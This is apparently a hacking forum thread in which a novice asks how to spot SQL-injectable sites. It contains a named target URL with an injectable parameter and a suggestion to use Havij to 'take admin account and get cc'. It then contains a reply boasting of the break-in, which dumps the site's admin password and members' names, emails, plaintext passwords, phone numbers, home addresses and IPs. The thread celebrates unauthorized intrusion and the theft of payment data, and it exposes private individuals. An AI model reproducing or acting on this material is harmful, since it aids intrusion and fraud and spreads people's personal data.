sql injection

by performing an SQL injection,
use valid statements.

http://www.google.hu/aclk?sa=l&ai=C-LkPe5MeUY-xBNG4swaX0YHACaur8IMDt7PuhAiDl7GxMAgAEAEgtlQoA1D-5ay--f____8BYN3y3YOYDaAB6fPe_gPIAQGqBBxP0DQzfh84xIowz4Hejls87LQA0itb34SU4E0CgAWQToAH_4uhAQ&sig=AOD64_3Zbze9azunYnswTYGbQKkogeiVgw&ved=0CCkQ0Qw&adurl=http://www.imperva.com/lg/lgg.asp%3Fpid%3D213%26_kk%3Dsql%2520vulnerability%2520scanner%26_kt%3De1bc74cb-40ef-4357-b63c-0c67fc1778d9&rct=j&q=sql+vulnerability+scanner

or you can get a scanner, but i always perform SQL with no scan…

Have you already used the search function?

Here is what I found on this site:
Forum:
99-mssql-database-structured-query-language-injection
111-sql-injection-with-all-ways
745-list-of-sql-xss-strings
614-read-a-websites-db-using-sqlmap-proxychains
Articles:
about-sql-injections-with-ms-sql-server

i mean is there things to look out for that help spot a vulnerable

thanks coldIV thats the sort of stuff i have been trying to find on the forum

You should really click on the link in my previous post.. There will be something that helps you.

EDIT: Posted at the wrong time I guess! No problem! And next time use the search function ;)

yer i had not refreshed the page before commenting

Me neither, but now we’ve read the post of each other so I guess it’s fine d:
Hope the links help you and that you will use the search function next time! ;)

:D
its all good ;D

Hey use havij to hack many vulnerable website like this http://mcxchakraa.com/buy.php?Id=-2 put it in havij url take admin account and get cc now………

Hi jhon94 , Just hacked into the website mentioned. So far there is a heck of a lot of data.
Stuff like:
Data Found: Id=1
Data Found: admin=sugar
Data Found: pass=salt!@#$%
Data Found: email=mcxchakraa@gmail.com
Data Found: dollar=54.00
Then all the member usernames:
Data Found: landline=
Data Found: address=fjhfh
Data Found: city=bangalore
Data Found: state=karnataka
Data Found: pincode=560050
Data Found: country=India
Data Found: astat=deactive
Data Found: regtime=13/9/2011 23:14
Data Found: regip=122.172.36.212
Data Found: Id=123
Data Found: name=praveen sharma
Data Found: email=hanivansh@yahoo.com
Data Found: pass=PRAVEEN.123
Data Found: mobile=9888416674
Data Found: landline=9888416674
Data Found: address=h.no.1122-p , sector 26
Data Found: city=panchkula
Data Found: state=haryana
Data Found: pincode=134113
Data Found: country=India
Data Found: astat=deactive
Data Found: regtime=14/9/2011 5:39
Data Found: regip=115.241.218.118
Data Found: Id=124
Data Found: name=vivek gupta
Data Found: email=shubham_asia@rediffmail.com
Data Found: pass=9935818282
Data Found: mobile=9935818282
Data Found: landline=05454274825
Data Found: address=stationrodemungrabadsharpur
Data Found: city=jaunpur
Data Found: state=u.p.
Data Found: pincode=222202
Data Found: country=India
Data Found: astat=deactive
Data Found: regtime=14/9/2011 11:09
Data Found: regip=116.202.40.112

It goes on and on and on. Good exercise and fun. :)